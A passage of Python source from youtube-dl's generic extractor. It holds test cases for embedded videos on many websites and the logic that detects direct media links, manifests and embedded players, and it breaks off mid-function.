'info_dict': {
'id': '148867247',
'ext': 'mp4',
'title': 'Understanding the web - Teaser',
'description': 'This is "Understanding the web - Teaser" by openclassrooms on Vimeo, the home for high quality videos and the people who love them.',
'upload_date': '20151214',
'uploader': 'OpenClassrooms',
'uploader_id': 'openclassrooms',
},
'add_ie': ['Vimeo'],
},
{
# generic vimeo embed that requires original URL passed as Referer
'url': 'http://racing4everyone.eu/2016/07/30/formula-1-2016-round12-germany/',
'only_matching': True,
},
{
'url': 'https://support.arkena.com/display/PLAY/Ways+to+embed+your+video',
'md5': 'b96f2f71b359a8ecd05ce4e1daa72365',
'info_dict': {
'id': 'b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe',
'ext': 'mp4',
'title': 'Big Buck Bunny',
'description': 'Royalty free test video',
'timestamp': 1432816365,
'upload_date': '20150528',
'is_live': False,
},
'params': {
'skip_download': True,
},
'add_ie': [ArkenaIE.ie_key()],
},
{
'url': 'http://nova.bg/news/view/2016/08/16/156543/%D0%BD%D0%B0-%D0%BA%D0%BE%D1%81%D1%8A%D0%BC-%D0%BE%D1%82-%D0%B2%D0%B7%D1%80%D0%B8%D0%B2-%D0%BE%D1%82%D1%86%D0%B5%D0%BF%D0%B8%D1%85%D0%B0-%D1%86%D1%8F%D0%BB-%D0%BA%D0%B2%D0%B0%D1%80%D1%82%D0%B0%D0%BB-%D0%B7%D0%B0%D1%80%D0%B0%D0%B4%D0%B8-%D0%B8%D0%B7%D1%82%D0%B8%D1%87%D0%B0%D0%BD%D0%B5-%D0%BD%D0%B0-%D0%B3%D0%B0%D0%B7-%D0%B2-%D0%BF%D0%BB%D0%BE%D0%B2%D0%B4%D0%B8%D0%B2/',
'info_dict': {
'id': '1c7141f46c',
'ext': 'mp4',
'title': 'НА КОСЪМ ОТ ВЗРИВ: Изтичане на газ на бензиностанция в Пловдив',
},
'params': {
'skip_download': True,
},
'add_ie': [Vbox7IE.ie_key()],
},
{
# DBTV embeds
'url': 'http://www.dagbladet.no/2016/02/23/nyheter/nordlys/ski/troms/ver/43254897/',
'info_dict': {
'id': '43254897',
'title': 'Etter ett års planlegging, klaffet endelig alt: - Jeg måtte ta en liten dans',
},
'playlist_mincount': 3,
},
{
# Videa embeds
'url': 'http://forum.dvdtalk.com/movie-talk/623756-deleted-magic-star-wars-ot-deleted-alt-scenes-docu-style.html',
'info_dict': {
'id': '623756-deleted-magic-star-wars-ot-deleted-alt-scenes-docu-style',
'title': 'Deleted Magic - Star Wars: OT Deleted / Alt. Scenes Docu. Style - DVD Talk Forum',
},
'playlist_mincount': 2,
},
{
# 20 minuten embed
'url': 'http://www.20min.ch/schweiz/news/story/So-kommen-Sie-bei-Eis-und-Schnee-sicher-an-27032552',
'info_dict': {
'id': '523629',
'ext': 'mp4',
'title': 'So kommen Sie bei Eis und Schnee sicher an',
'description': 'md5:117c212f64b25e3d95747e5276863f7d',
},
'params': {
'skip_download': True,
},
'add_ie': [TwentyMinutenIE.ie_key()],
},
{
# VideoPress embed
'url': 'https://en.support.wordpress.com/videopress/',
'info_dict': {
'id': 'OcobLTqC',
'ext': 'm4v',
'title': 'IMG_5786',
'timestamp': 1435711927,
'upload_date': '20150701',
},
'params': {
'skip_download': True,
},
'add_ie': [VideoPressIE.ie_key()],
},
{
# Rutube embed
'url': 'http://magazzino.friday.ru/videos/vipuski/kazan-2',
'info_dict': {
'id': '9b3d5bee0a8740bf70dfd29d3ea43541',
'ext': 'flv',
'title': 'Магаззино: Казань 2',
'description': 'md5:99bccdfac2269f0e8fdbc4bbc9db184a',
'uploader': 'Магаззино',
'upload_date': '20170228',
'uploader_id': '996642',
},
'params': {
'skip_download': True,
},
'add_ie': [RutubeIE.ie_key()],
},
{
# ThePlatform embedded with whitespaces in URLs
'url': 'http://www.golfchannel.com/topics/shows/golftalkcentral.htm',
'only_matching': True,
},
{
# Senate ISVP iframe https
'url': 'https://www.hsgac.senate.gov/hearings/canadas-fast-track-refugee-plan-unanswered-questions-and-implications-for-us-national-security',
'md5': 'fb8c70b0b515e5037981a2492099aab8',
'info_dict': {
'id': 'govtaff020316',
'ext': 'mp4',
'title': 'Integrated Senate Video Player',
},
'add_ie': [SenateISVPIE.ie_key()],
},
{
# Limelight embeds (1 channel embed + 4 media embeds)
'url': 'http://www.sedona.com/FacilitatorTraining2017',
'info_dict': {
'id': 'FacilitatorTraining2017',
'title': 'Facilitator Training 2017',
},
'playlist_mincount': 5,
},
{
# Limelight embed (LimelightPlayerUtil.embed)
'url': 'https://tv5.ca/videos?v=xuu8qowr291ri',
'info_dict': {
'id': '95d035dc5c8a401588e9c0e6bd1e9c92',
'ext': 'mp4',
'title': '07448641',
'timestamp': 1499890639,
'upload_date': '20170712',
},
'params': {
'skip_download': True,
},
'add_ie': ['LimelightMedia'],
},
{
'url': 'http://kron4.com/2017/04/28/standoff-with-walnut-creek-murder-suspect-ends-with-arrest/',
'info_dict': {
'id': 'standoff-with-walnut-creek-murder-suspect-ends-with-arrest',
'title': 'Standoff with Walnut Creek murder suspect ends',
'description': 'md5:3ccc48a60fc9441eeccfc9c469ebf788',
},
'playlist_mincount': 4,
},
{
# WashingtonPost embed
'url': 'http://www.vanityfair.com/hollywood/2017/04/donald-trump-tv-pitches',
'info_dict': {
'id': '8caf6e88-d0ec-11e5-90d3-34c2c42653ac',
'ext': 'mp4',
'title': "No one has seen the drama series based on Trump's life \u2014 until now",
'description': 'Donald Trump wanted a weekly TV drama based on his life. It never aired. But The Washington Post recently obtained a scene from the pilot script — and enlisted actors.',
'timestamp': 1455216756,
'uploader': 'The Washington Post',
'upload_date': '20160211',
},
'add_ie': [WashingtonPostIE.ie_key()],
},
{
# Mediaset embed
'url': 'http://www.tgcom24.mediaset.it/politica/serracchiani-voglio-vivere-in-una-societa-aperta-reazioni-sproporzionate-_3071354-201702a.shtml',
'info_dict': {
'id': '720642',
'ext': 'mp4',
'title': 'Serracchiani: "Voglio vivere in una società aperta, con tutela del patto di fiducia"',
},
'params': {
'skip_download': True,
},
'add_ie': [MediasetIE.ie_key()],
},
{
# JOJ.sk embeds
'url': 'https://www.noviny.sk/slovensko/238543-slovenskom-sa-prehnala-vlna-silnych-burok',
'info_dict': {
'id': '238543-slovenskom-sa-prehnala-vlna-silnych-burok',
'title': 'Slovenskom sa prehnala vlna silných búrok',
},
'playlist_mincount': 5,
'add_ie': [JojIE.ie_key()],
},
{
# AMP embed (see https://www.ampproject.org/docs/reference/components/amp-video)
'url': 'https://tvrain.ru/amp/418921/',
'md5': 'cc00413936695987e8de148b67d14f1d',
'info_dict': {
'id': '418921',
'ext': 'mp4',
'title': 'Стас Намин: «Мы нарушили девственность Кремля»',
},
},
{
# vzaar embed
'url': 'http://help.vzaar.com/article/165-embedding-video',
'md5': '7e3919d9d2620b89e3e00bec7fe8c9d4',
'info_dict': {
'id': '8707641',
'ext': 'mp4',
'title': 'Building A Business Online: Principal Chairs Q & A',
},
},
{
# multiple HTML5 videos on one page
'url': 'https://www.paragon-software.com/home/rk-free/keyscenarios.html',
'info_dict': {
'id': 'keyscenarios',
'title': 'Rescue Kit 14 Free Edition - Getting started',
},
'playlist_count': 4,
},
{
# vshare embed
'url': 'https://youtube-dl-demo.neocities.org/vshare.html',
'md5': '17b39f55b5497ae8b59f5fbce8e35886',
'info_dict': {
'id': '0f64ce6',
'title': 'vl14062007715967',
'ext': 'mp4',
}
},
{
'url': 'http://www.heidelberg-laureate-forum.org/blog/video/lecture-friday-september-23-2016-sir-c-antony-r-hoare/',
'md5': 'aecd089f55b1cb5a59032cb049d3a356',
'info_dict': {
'id': '90227f51a80c4d8f86c345a7fa62bd9a1d',
'ext': 'mp4',
'title': 'Lecture: Friday, September 23, 2016 - Sir Tony Hoare',
'description': 'md5:5a51db84a62def7b7054df2ade403c6c',
'timestamp': 1474354800,
'upload_date': '20160920',
}
},
{
'url': 'http://www.kidzworld.com/article/30935-trolls-the-beat-goes-on-interview-skylar-astin-and-amanda-leighton',
'info_dict': {
'id': '1731611',
'ext': 'mp4',
'title': 'Official Trailer | TROLLS: THE BEAT GOES ON!',
'description': 'md5:eb5f23826a027ba95277d105f248b825',
'timestamp': 1516100691,
'upload_date': '20180116',
},
'params': {
'skip_download': True,
},
'add_ie': [SpringboardPlatformIE.ie_key()],
},
{
'url': 'https://www.youtube.com/shared?ci=1nEzmT-M4fU',
'info_dict': {
'id': 'uPDB5I9wfp8',
'ext': 'webm',
'title': 'Pocoyo: 90 minutos de episódios completos Português para crianças - PARTE 3',
'description': 'md5:d9e4d9346a2dfff4c7dc4c8cec0f546d',
'upload_date': '20160219',
'uploader': 'Pocoyo - Português (BR)',
'uploader_id': 'PocoyoBrazil',
},
'add_ie': [YoutubeIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.yapfiles.ru/show/1872528/690b05d3054d2dbe1e69523aa21bb3b1.mp4.html',
'info_dict': {
'id': 'vMDE4NzI1Mjgt690b',
'ext': 'mp4',
'title': 'Котята',
},
'add_ie': [YapFilesIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# CloudflareStream embed
'url': 'https://www.cloudflare.com/products/cloudflare-stream/',
'info_dict': {
'id': '31c9291ab41fac05471db4e73aa11717',
'ext': 'mp4',
'title': '31c9291ab41fac05471db4e73aa11717',
},
'add_ie': [CloudflareStreamIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# PeerTube embed
'url': 'https://joinpeertube.org/fr/home/',
'info_dict': {
'id': 'home',
'title': 'Reprenez le contrôle de vos vidéos ! #JoinPeertube',
},
'playlist_count': 2,
},
{
# Indavideo embed
'url': 'https://streetkitchen.hu/receptek/igy_kell_otthon_hamburgert_sutni/',
'info_dict': {
'id': '1693903',
'ext': 'mp4',
'title': 'Így kell otthon hamburgert sütni',
'description': 'md5:f5a730ecf900a5c852e1e00540bbb0f7',
'timestamp': 1426330212,
'upload_date': '20150314',
'uploader': 'StreetKitchen',
'uploader_id': '546363',
},
'add_ie': [IndavideoEmbedIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# APA embed via JWPlatform embed
'url': 'http://www.vol.at/blue-man-group/5593454',
'info_dict': {
'id': 'jjv85FdZ',
'ext': 'mp4',
'title': '"Blau ist mysteriös": Die Blue Man Group im Interview',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 254,
'timestamp': 1519211149,
'upload_date': '20180221',
},
'params': {
'skip_download': True,
},
},
{
'url': 'http://share-videos.se/auto/video/83645793?uid=13',
'md5': 'b68d276de422ab07ee1d49388103f457',
'info_dict': {
'id': '83645793',
'title': 'Lock up and get excited',
'ext': 'mp4'
},
'skip': 'TODO: fix nested playlists processing in tests',
},
{
# Viqeo embeds
'url': 'https://viqeo.tv/',
'info_dict': {
'id': 'viqeo',
'title': 'All-new video platform',
},
'playlist_count': 6,
},
{
# Squarespace video embed, 2019-08-28
'url': 'http://ootboxford.com',
'info_dict': {
'id': 'Tc7b_JGdZfw',
'title': 'Out of the Blue, at Childish Things 10',
'ext': 'mp4',
'description': 'md5:a83d0026666cf5ee970f8bd1cfd69c7f',
'uploader_id': 'helendouglashouse',
'uploader': 'Helen & Douglas House',
'upload_date': '20140328',
},
'params': {
'skip_download': True,
},
},
{
# Zype embed
'url': 'https://www.cookscountry.com/episode/554-smoky-barbecue-favorites',
'info_dict': {
'id': '5b400b834b32992a310622b9',
'ext': 'mp4',
'title': 'Smoky Barbecue Favorites',
'thumbnail': r're:^https?://.*\.jpe?g',
'description': 'md5:5ff01e76316bd8d46508af26dc86023b',
'upload_date': '20170909',
'timestamp': 1504915200,
},
'add_ie': [ZypeIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# videojs embed
'url': 'https://video.sibnet.ru/shell.php?videoid=3422904',
'info_dict': {
'id': 'shell',
'ext': 'mp4',
'title': 'Доставщик пиццы спросил разрешения сыграть на фортепиано',
'description': 'md5:89209cdc587dab1e4a090453dbaa2cb1',
'thumbnail': r're:^https?://.*\.jpg$',
},
'params': {
'skip_download': True,
},
'expected_warnings': ['Failed to download MPD manifest'],
},
{
# DailyMotion embed with DM.player
'url': 'https://www.beinsports.com/us/copa-del-rey/video/the-locker-room-valencia-beat-barca-in-copa/1203804',
'info_dict': {
'id': 'k6aKkGHd9FJs4mtJN39',
'ext': 'mp4',
'title': 'The Locker Room: Valencia Beat Barca In Copa del Rey Final',
'description': 'This video is private.',
'uploader_id': 'x1jf30l',
'uploader': 'beIN SPORTS USA',
'upload_date': '20190528',
'timestamp': 1559062971,
},
'params': {
'skip_download': True,
},
},
# {
# # TODO: find another test
# # http://schema.org/VideoObject
# 'url': 'https://flipagram.com/f/nyvTSJMKId',
# 'md5': '888dcf08b7ea671381f00fab74692755',
# 'info_dict': {
# 'id': 'nyvTSJMKId',
# 'ext': 'mp4',
# 'title': 'Flipagram by sjuria101 featuring Midnight Memories by One Direction',
# 'description': '#love for cats.',
# 'timestamp': 1461244995,
# 'upload_date': '20160421',
# },
# 'params': {
# 'force_generic_extractor': True,
# },
# }
]
def report_following_redirect(self, new_url):
"""Report information extraction."""
self._downloader.to_screen('[redirect] Following redirect to %s' % new_url)
def _extract_rss(self, url, video_id, doc):
playlist_title = doc.find('./channel/title').text
playlist_desc_el = doc.find('./channel/description')
playlist_desc = None if playlist_desc_el is None else playlist_desc_el.text
entries = []
for it in doc.findall('./channel/item'):
next_url = None
enclosure_nodes = it.findall('./enclosure')
for e in enclosure_nodes:
next_url = e.attrib.get('url')
if next_url:
break
if not next_url:
next_url = xpath_text(it, 'link', fatal=False)
if not next_url:
continue
entries.append({
'_type': 'url_transparent',
'url': next_url,
'title': it.find('title').text,
})
return {
'_type': 'playlist',
'id': url,
'title': playlist_title,
'description': playlist_desc,
'entries': entries,
}
def _extract_camtasia(self, url, video_id, webpage):
""" Returns None if no camtasia video can be found. """
camtasia_cfg = self._search_regex(
r'fo\.addVariable\(\s*"csConfigFile",\s*"([^"]+)"\s*\);',
webpage, 'camtasia configuration file', default=None)
if camtasia_cfg is None:
return None
title = self._html_search_meta('DC.title', webpage, fatal=True)
camtasia_url = compat_urlparse.urljoin(url, camtasia_cfg)
camtasia_cfg = self._download_xml(
camtasia_url, video_id,
note='Downloading camtasia configuration',
errnote='Failed to download camtasia configuration')
fileset_node = camtasia_cfg.find('./playlist/array/fileset')
entries = []
for n in fileset_node.getchildren():
url_n = n.find('./uri')
if url_n is None:
continue
entries.append({
'id': os.path.splitext(url_n.text.rpartition('/')[2])[0],
'title': '%s - %s' % (title, n.tag),
'url': compat_urlparse.urljoin(url, url_n.text),
'duration': float_or_none(n.find('./duration').text),
})
return {
'_type': 'playlist',
'entries': entries,
'title': title,
}
def _real_extract(self, url):
if url.startswith('//'):
return self.url_result(self.http_scheme() + url)
parsed_url = compat_urlparse.urlparse(url)
if not parsed_url.scheme:
default_search = self._downloader.params.get('default_search')
if default_search is None:
default_search = 'fixup_error'
if default_search in ('auto', 'auto_warning', 'fixup_error'):
if re.match(r'^[^\s/]+\.[^\s/]+/', url):
self._downloader.report_warning('The url doesn\'t specify the protocol, trying with http')
return self.url_result('http://' + url)
elif default_search != 'fixup_error':
if default_search == 'auto_warning':
if re.match(r'^(?:url|URL)$', url):
raise ExtractorError(
'Invalid URL: %r . Call youtube-dl like this: youtube-dl -v "https://www.youtube.com/watch?v=BaW_jenozKc" ' % url,
expected=True)
else:
self._downloader.report_warning(
'Falling back to youtube search for %s . Set --default-search "auto" to suppress this warning.' % url)
return self.url_result('ytsearch:' + url)
if default_search in ('error', 'fixup_error'):
raise ExtractorError(
'%r is not a valid URL. '
'Set --default-search "ytsearch" (or run youtube-dl "ytsearch:%s" ) to search YouTube'
% (url, url), expected=True)
else:
if ':' not in default_search:
default_search += ':'
return self.url_result(default_search + url)
url, smuggled_data = unsmuggle_url(url)
force_videoid = None
is_intentional = smuggled_data and smuggled_data.get('to_generic')
if smuggled_data and 'force_videoid' in smuggled_data:
force_videoid = smuggled_data['force_videoid']
video_id = force_videoid
else:
video_id = self._generic_id(url)
self.to_screen('%s: Requesting header' % video_id)
head_req = HEADRequest(url)
head_response = self._request_webpage(
head_req, video_id,
note=False, errnote='Could not send HEAD request to %s' % url,
fatal=False)
if head_response is not False:
# Check for redirect
new_url = compat_str(head_response.geturl())
if url != new_url:
self.report_following_redirect(new_url)
if force_videoid:
new_url = smuggle_url(
new_url, {'force_videoid': force_videoid})
return self.url_result(new_url)
full_response = None
if head_response is False:
request = sanitized_Request(url)
request.add_header('Accept-Encoding', '*')
full_response = self._request_webpage(request, video_id)
head_response = full_response
info_dict = {
'id': video_id,
'title': self._generic_title(url),
'upload_date': unified_strdate(head_response.headers.get('Last-Modified'))
}
# Check for direct link to a video
content_type = head_response.headers.get('Content-Type', '').lower()
m = re.match(r'^(?P<type>audio|video|application(?=/(?:ogg$|(?:vnd\.apple\.|x-)?mpegurl)))/(?P<format_id>[^;\s]+)', content_type)
if m:
format_id = compat_str(m.group('format_id'))
if format_id.endswith('mpegurl'):
formats = self._extract_m3u8_formats(url, video_id, 'mp4')
elif format_id == 'f4m':
formats = self._extract_f4m_formats(url, video_id)
else:
formats = [{
'format_id': format_id,
'url': url,
'vcodec': 'none' if m.group('type') == 'audio' else None
}]
info_dict['direct'] = True
self._sort_formats(formats)
info_dict['formats'] = formats
return info_dict
if not self._downloader.params.get('test', False) and not is_intentional:
force = self._downloader.params.get('force_generic_extractor', False)
self._downloader.report_warning(
'%s on generic information extractor.' % ('Forcing' if force else 'Falling back'))
if not full_response:
request = sanitized_Request(url)
# Some webservers may serve compressed content of rather big size (e.g. gzipped flac)
# making it impossible to download only chunk of the file (yet we need only 512kB to
# test whether it's HTML or not). According to youtube-dl default Accept-Encoding
# that will always result in downloading the whole file that is not desirable.
# Therefore for extraction pass we have to override Accept-Encoding to any in order
# to accept raw bytes and being able to download only a chunk.
# It may probably better to solve this by checking Content-Type for application/octet-stream
# after HEAD request finishes, but not sure if we can rely on this.
request.add_header('Accept-Encoding', '*')
full_response = self._request_webpage(request, video_id)
first_bytes = full_response.read(512)
# Is it an M3U playlist?
if first_bytes.startswith(b'#EXTM3U'):
info_dict['formats'] = self._extract_m3u8_formats(url, video_id, 'mp4')
self._sort_formats(info_dict['formats'])
return info_dict
# Maybe it's a direct link to a video?
# Be careful not to download the whole thing!
if not is_html(first_bytes):
self._downloader.report_warning(
'URL could be a direct video link, returning it as such.')
info_dict.update({
'direct': True,
'url': url,
})
return info_dict
webpage = self._webpage_read_content(
full_response, url, video_id, prefix=first_bytes)
self.report_extraction(video_id)
# Is it an RSS feed, a SMIL file, an XSPF playlist or a MPD manifest?
try:
doc = compat_etree_fromstring(webpage.encode('utf-8'))
if doc.tag == 'rss':
return self._extract_rss(url, video_id, doc)
elif doc.tag == 'SmoothStreamingMedia':
info_dict['formats'] = self._parse_ism_formats(doc, url)
self._sort_formats(info_dict['formats'])
return info_dict
elif re.match(r'^(?:{[^}]+})?smil$', doc.tag):
smil = self._parse_smil(doc, url, video_id)
self._sort_formats(smil['formats'])
return smil
elif doc.tag == '{http://xspf.org/ns/0/}playlist':
return self.playlist_result(
self._parse_xspf(
doc, video_id, xspf_url=url,
xspf_base_url=compat_str(full_response.geturl())),
video_id)
elif re.match(r'(?i)^(?:{[^}]+})?MPD$', doc.tag):
info_dict['formats'] = self._parse_mpd_formats(
doc,
mpd_base_url=compat_str(full_response.geturl()).rpartition('/')[0],
mpd_url=url)
self._sort_formats(info_dict['formats'])
return info_dict
elif re.match(r'^{http://ns\.adobe\.com/f4m/[12]\.0}manifest$', doc.tag):
info_dict['formats'] = self._parse_f4m_formats(doc, url, video_id)
self._sort_formats(info_dict['formats'])
return info_dict
except compat_xml_parse_error:
pass
# Is it a Camtasia project?
camtasia_res = self._extract_camtasia(url, video_id, webpage)
if camtasia_res is not None:
return camtasia_res
# Sometimes embedded video player is hidden behind percent encoding
# (e.g. https://github.com/ytdl-org/youtube-dl/issues/2448)
# Unescaping the whole page allows to handle those cases in a generic way
webpage = compat_urllib_parse_unquote(webpage)
# Unescape squarespace embeds to be detected by generic extractor,
# see https://github.com/ytdl-org/youtube-dl/issues/21294
webpage = re.sub(
r'<div[^>]+class=[^>]*?\bsqs-video-wrapper\b[^>]*>',
lambda x: unescapeHTML(x.group(0)), webpage)
# it's tempting to parse this further, but you would
# have to take into account all the variations like
# Video Title - Site Name
# Site Name | Video Title
# Video Title - Tagline | Site Name
# and so on and so forth; it's just not practical
video_title = self._og_search_title(
webpage, default=None) or self._html_search_regex(
r'(?s)<title>(.*?)</title>', webpage, 'video title',
default='video')
# Try to detect age limit automatically
age_limit = self._rta_search(webpage)
# And then there are the jokers who advertise that they use RTA,
# but actually don't.
AGE_LIMIT_MARKERS = [
r'Proudly Labeled <a href="http://www\.rtalabel\.org/" title="Restricted to Adults">RTA</a>',
]
if any(re.search(marker, webpage) for marker in AGE_LIMIT_MARKERS):
age_limit = 18
# video uploader is domain name
video_uploader = self._search_regex(
r'^(?:https?://)?([^/]*)/.*', url, 'video uploader')
video_description = self._og_search_description(webpage, default=None)
video_thumbnail = self._og_search_thumbnail(webpage, default=None)
info_dict.update({
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'age_limit': age_limit,
})
# Look for Brightcove Legacy Studio embeds
bc_urls = BrightcoveLegacyIE._extract_brightcove_urls(webpage)
if bc_urls:
entries = [{
'_type': 'url',
'url': smuggle_url(bc_url, {'Referer': url}),
'ie_key': 'BrightcoveLegacy'
} for bc_url in bc_urls]
return {
'_type': 'playlist',
'title': video_title,
'id': video_id,
'entries': entries,
}
# Look for Brightcove New Studio embeds
bc_urls = BrightcoveNewIE._extract_urls(self, webpage)
if bc_urls:
return self.playlist_from_matches(
bc_urls, video_id, video_title,
getter=lambda x: smuggle_url(x, {'referrer': url}),
ie='BrightcoveNew')
# Look for Nexx embeds
nexx_urls = NexxIE._extract_urls(webpage)
if nexx_urls:
return self.playlist_from_matches(nexx_urls, video_id, video_title, ie=NexxIE.ie_key())
# Look for Nexx iFrame embeds
nexx_embed_urls = NexxEmbedIE._extract_urls(webpage)
if nexx_embed_urls:
return self.playlist_from_matches(nexx_embed_urls, video_id, video_title, ie=NexxEmbedIE.ie_key())
# Look for ThePlatform embeds
tp_urls = ThePlatformIE._extract_urls(webpage)
if tp_urls:
return self.playlist_from_matches(tp_urls, video_id, video_title, ie='ThePlatform')
# Look for embedded rtl.nl player
matches = re.findall(
r'<iframe[^>]+?src="((?:https?:)?//(?:(?:www|static)\.)?rtl\.nl/(?:system/videoplayer/[^"]+(?:video_)?)?embed[^"]+)"',
webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title, ie='RtlNl')
vimeo_urls = VimeoIE._extract_urls(url, webpage)
if vimeo_urls:
return self.playlist_from_matches(vimeo_urls, video_id, video_title, ie=VimeoIE.ie_key())
vid_me_embed_url = self._search_regex(
r'src=[\'"](https?://vid\.me/[^\'"]+)[\'"]',
webpage, 'vid.me embed', default=None)
if vid_me_embed_url is not None:
return self.url_result(vid_me_embed_url, 'Vidme')
# Look for YouTube embeds
youtube_urls = YoutubeIE._extract_urls(webpage)
if youtube_urls:
return self.playlist_from_matches(
youtube_urls, video_id, video_title, ie=YoutubeIE.ie_key())
matches = DailymotionIE._extract_urls(webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title)
# Look for embedded Dailymotion playlist player (#3822)
m = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.[a-z]{2,3}/widget/jukebox\?.+?)\1', webpage)
if m:
playlists = re.findall(
r'list\[\]=/playlist/([^/]+)/', unescapeHTML(m.group('url')))
if playlists:
return self.playlist_from_matches(
playlists, video_id, video_title, lambda p: '//dailymotion.com/playlist/%s' % p)
# Look for DailyMail embeds
dailymail_urls = DailyMailIE._extract_urls(webpage)
if dailymail_urls:
return self.playlist_from_matches(
dailymail_urls, video_id, video_title, ie=DailyMailIE.ie_key())
# Look for embedded Wistia player
wistia_urls = WistiaIE._extract_urls(webpage)
if wistia_urls:
playlist = self.playlist_from_matches(wistia_urls, video_id, video_title, ie=WistiaIE.ie_key())
for entry in playlist['entries']:
entry.update({
'_type': 'url_transparent',
'uploader': video_uploader,
})
return playlist
# Look for SVT player
svt_url = SVTIE._extract_url(webpage)
if svt_url:
return self.url_result(svt_url, 'SVT')
# Look for Bandcamp pages with custom domain
mobj = re.search(r'<meta property="og:url"[^>]*?content="(.*?bandcamp\.com.*?)"', webpage)
if mobj is not None:
burl = unescapeHTML(mobj.group(1))
# Don't set the extractor because it can be a track url or an album
return self.url_result(burl)
# Look for embedded Vevo player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//(?:cache\.)?vevo\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for embedded Viddler player
mobj = re.search(
r'<(?:iframe[^>]+?src|param[^>]+?value)=(["\'])(?P<url>(?:https?:)?//(?:www\.)?viddler\.com/(?:embed|player)/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for NYTimes player
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//graphics8\.nytimes\.com/bcvideo/[^/]+/iframe/embed\.html.+?)\1>',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for Libsyn player
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//html5-player\.libsyn\.com/embed/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for Ooyala videos
mobj = (re.search(r'player\.ooyala\.com/[^"?]+[?#][^"]*?(?:embedCode|ec)=(?P<ec>[^"&]+)', webpage)
or re.search(r'OO\.Player\.create\([\'"].*?[\'"],\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'OO\.Player\.create\.apply\(\s*OO\.Player\s*,\s*op\(\s*\[\s*[\'"][^\'"]*[\'"]\s*,\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'SBN\.VideoLinkset\.ooyala\([\'"](?P<ec>.{32})[\'"]\)', webpage)
or re.search(r'data-ooyala-video-id\s*=\s*[\'"](?P<ec>.{32})[\'"]', webpage))
if mobj is not None:
embed_token = self._search_regex(
r'embedToken[\'"]?\s*:\s*[\'"]([^\'"]+)',
webpage, 'ooyala embed token', default=None)
return OoyalaIE._build_url_result(smuggle_url(
mobj.group('ec'), {
'domain': url,
'embed_token': embed_token,
}))
# Look for multiple Ooyala embeds on SBN network websites
mobj = re.search(r'SBN\.VideoLinkset\.entryGroup\((\[.*?\])', webpage)
if mobj is not None:
embeds = self._parse_json(mobj.group(1), video_id, fatal=False)
if embeds:
return self.playlist_from_matches(
embeds, video_id, video_title,
getter=lambda v: OoyalaIE._url_for_embed_code(smuggle_url(v['provider_video_id'], {'domain': url})), ie='Ooyala')
# Look for Aparat videos
mobj = re.search(r'<iframe .*?src="(http://www\.aparat\.com/video/[^"]+)"', webpage)
if mobj is not None:
return self.url_result(mobj.group(1), 'Aparat')
# Look for MPORA videos
mobj = re.search(r'<iframe .*?src="(http://mpora\.(?:com|de)/videos/[^"]+)"', webpage)
if mobj is not None:
return self.url_result(mobj.group(1), 'Mpora')
# Look for embedded Facebook player
facebook_urls = FacebookIE._extract_urls(webpage)
if facebook_urls:
return self.playlist_from_matches(facebook_urls, video_id, video_title)
# Look for embedded VK player
mobj = re.search(r'<iframe[^>]+?src=(["\'])(?P<url>https?://vk\.com/video_ext\.php.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'VK')
# Look for embedded Odnoklassniki player
odnoklassniki_url = OdnoklassnikiIE._extract_url(webpage)
if odnoklassniki_url:
return self.url_result(odnoklassniki_url, OdnoklassnikiIE.ie_key())
# Look for embedded ivi player
mobj = re.search(r'<embed[^>]+?src=(["\'])(?P<url>https?://(?:www\.)?ivi\.ru/video/player.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Ivi')
# Look for embedded Huffington Post player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://embed\.live\.huffingtonpost\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'HuffPost')
# Look for embed.ly
mobj = re.search(r'class=["\']embedly-card["\'][^>]href=["\'](?P<url>[^"\']+)', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
mobj = re.search(r'class=["\']embedly-embed["\'][^>]src=["\'][^"\']*url=(?P<url>[^&]+)', webpage)
if mobj is not None:
return self.url_result(compat_urllib_parse_unquote(mobj.group('url')))
# Look for funnyordie embed
matches = re.findall(r'<iframe[^>]+?src="(https?://(?:www\.)?funnyordie\.com/embed/[^"]+)"', webpage)
if matches:
return self.playlist_from_matches(
matches, video_id, video_title, getter=unescapeHTML, ie='FunnyOrDie')
# Look for BBC iPlayer embed
matches = re.findall(r'setPlaylist\("(https?://www\.bbc\.co\.uk/iplayer/[^/]+/[\da-z]{8})"\)', webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title, ie='BBCCoUk')
# Look for embedded RUTV player
rutv_url = RUTVIE._extract_url(webpage)
if rutv_url:
return self.url_result(rutv_url, 'RUTV')
# Look for embedded TVC player
tvc_url = TVCIE._extract_url(webpage)
if tvc_url:
return self.url_result(tvc_url, 'TVC')
# Look for embedded SportBox player
sportbox_urls = SportBoxIE._extract_urls(webpage)
if sportbox_urls:
return self.playlist_from_matches(sportbox_urls, video_id, video_title, ie=SportBoxIE.ie_key())
# Look for embedded XHamster player
xhamster_urls = XHamsterEmbedIE._extract_urls(webpage)
if xhamster_urls:
